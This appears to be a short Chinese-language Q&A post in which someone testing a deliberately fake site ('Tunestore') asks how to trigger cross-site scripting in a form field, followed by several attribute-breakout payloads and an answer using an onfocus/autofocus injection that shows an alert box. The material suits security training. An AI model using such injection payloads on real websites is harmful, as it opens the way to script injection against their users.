我正在尝试在一个虚假的网站上找到漏洞,我想知道如何在这个输入字段中启动XSS代码?
<form name="friendForm" method="POST" action="/Tunestore/addfriend.do">
Friend name: <input type="text" name="friend" value=""
<script>alert(1)</script>"><br>
<input type="submit" value="Submit">
</form>
"> <script>alert(1)</script>
" onfocus="alert(1)"
" onclick="alert(1)
试试这个:
“onfocus =”alert(1)“autofocus =”
它将扩展为:<'input type =“text”name =“friend”value =“”onfocus =“alert(1)”autofocus =“”/>
这将导致一个警告框,演示XSS。